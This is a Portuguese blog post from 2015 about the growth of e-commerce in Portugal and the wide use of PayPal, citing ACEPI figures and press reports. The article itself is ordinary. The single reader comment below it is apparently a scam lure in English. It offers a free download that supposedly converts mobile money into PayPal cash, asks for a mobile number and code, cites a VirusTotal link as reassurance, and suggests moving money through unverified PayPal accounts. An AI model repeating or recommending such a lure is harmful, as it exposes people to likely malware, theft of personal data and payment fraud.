terça-feira, 28 de abril de 2015

Compras online entre os portugueses: em crescimento e via PayPal

O e-commerce português tem vindo, claramente, a seguir a tendência dos países do sul da Europa, com um aumento exponencial nos últimos anos. Com a internet a promover o consumo e com a Geração Net a dar de si – pela comodidade e variedade de escolhas – a verdade é que o e-commerce veio para (simpli)ficar.


Com o sentimento económico a melhorar (Dinheiro Vivo, 2015) – uma vez que os portugueses estão mais dispostos a comprar (ainda que não sejam compras caras) – também as compras online se reveem neste clima positivo.

As compras online em B2C cresceram, em Portugal, 13% e atingiram os 2,9 mil milhões de euros em 2014. Cada e-comprador português despendeu, em média, 988€ em bens ou serviços online, acima de Espanha e de Itália, segundo o comunicado da ACEPI (Computer World, 2015).

A ACEPI é a Associação da Economia Digital Portuguesa e juntou-se à Ecommerce Europe, uma organização europeia para o comércio eletrónico que junta empresas que dispõe os seus produtos e/ou serviços online.

Para a Associação da Economia Digital, esta é uma ótima parceria dado o alinhamento que existe entre as duas organizações e o potencial de trabalho conjunto. Segundo François Momboisse, presidente da Ecommerce Europe, “A Europa do Sul é um importante mercado emergente no comércio eletrónico e, com esta adesão, podemos representar ainda melhor os interesses da região no comércio eletrónico”.

ACEPI - EE
Em Portugal, e segundo dados do B2C Ecommerce Report de 2013, 7 milhões de pessoas têm acesso à Internet, sendo que 2.7 milhões destas são e-shoppers. O mercado das compras online representou, nesse ano, 1.57% do PIB, num total de 2,6 mil milhões e euros, gastos em igual medida em serviços e em produtos. 3.1% das compras de bens de retalho são agora feitas online. Ao ano do relatório, Portugal ocupava a 5ª posição no ranking dos 8 países do Sul da Europa, posição que tem vindo a melhorar.

No entanto, 61% das pessoas com acesso à Internet não adquiriram, no ano de 2013, quaisquer bens ou serviços online, constituindo um segmento de 4,3 milhões de pessoas inativas online. Se, em 2010, o valor médio despendido por e-shopper era de 860€, em 2014 esse valor chegou quase aos 990€, com níveis de penetração multi-dispositivos: telemóvel (115%), internet (64%), smartphone (30%) e tablet (9%).

Grande parte das compras são efetuadas com recurso ao Paypal, que regista, de momento, 500 mil contas ativas em Portugal, num universo total de 165 milhões a nível mundial e 4 milhões a nível Ibérico. 70% das grandes marcas nacionais incorporam já este sistema nas suas lojas online, entre as quais as do grupo Sonae, TAP, Rede Expressos, entre outros. Hoje, já é possível encontrar a opção PayPal em 100 milhões de comerciantes a nível mundial e fazer compras em cerca de 100 moedas diferentes. Este sistema veio, segundo o responsável pela Paypal em Portugal, ajudar o comércio online a “chegar a países onde o cartão de crédito não é muito utilizado. Porque com o selo PayPal as pessoas sentem-se mais seguras ao fazer compras online” (Observador, 2015).

Em Portugal, cerca de 20% das compras efetuadas através da PayPal ocorrem em dispositivos móveis, dado que o cliente não tem custos com a utilização. O comerciante paga uma taxa variável à empresa, que é tanto menor quanto maior for o número de vendas que esta fizer. A plataforma funciona ainda como mediadora de conflitos entre compradores e vendedores, seguindo a tendência de desintermediação e dos novos intermediários, com mecanismos de combate à fraude. Os portugueses compram, essencialmente, produtos de moda, eletrónica e viagens, e dividem-se entre o PayPal e o cartão de crédito para efetuar os pagamentos, este que constitui o seu grande concorrente.

Miguel Fernandes, da PayPal Portugal, garante que a crise foi uma grande oportunidade para as empresas online. Em 2014, as receitas da Paypal ultrapassaram os 7 mil milhões de euros, mais 19% do que no ano anterior, com um grande peso do eBay, e o volume de pagamentos fixou-se nos 212,2 milhões de euros no mesmo ano, mais 34% do que em 2013.

Mais do que uma oportunidade para as empresas online, a crise constituiu uma oportunidade para os novos intermediários, e, essencialmente, para o consumidor. Cada vez mais exigentes, poderosos, atentos e participativos, os e-surfers procuram comodidade, variedade ou, tão somente, informação, podendo optar pela experiência ROPO.

E os alunos de Web Marketing e Comércio Eletrónico, fazem compras online?

Fontes consultadas:
Computer World (2015): ACEPI adere à Ecommerce Europe.

Dinheiro Vivo (2015): A vontade de Comprar voltou. 10 regras para decisões inteligentes. http://www.dinheirovivo.pt/Empresas/interior.aspx?content_id=4535691

Observador (2015): 500 mil portugueses utilizam PayPal para comprar onlinehttp://observador.pt/2015/04/23/500-mil-portugueses-utilizam-paypal-comprar-online/

1 comentário:

  1. Hi,

    I would like to give this archive for free. It has a method to convert mobile money to paypal cash almost instantly.

    What you only have to do is fill the form by submiting your mobile number and retrieving the code.

    After filling the rest of your details, click on Cash In!
    and fill the anti robot spam box.

    Wait a few seconds/minutes until it arrives to your paypal account.

    Note: You can create unverified paypal accounts and send the money throught them and buy domains for example.

    Download:
    http://rghost.net/858JpQrqn

    Virustotal:
    https://www.virustotal.com/en/file/e10a358f4e0f168ba6b7b8584bf8d5761d486e8decf9cadecaaf78799232ab2d/analysis/1444684878/

    ResponderEliminar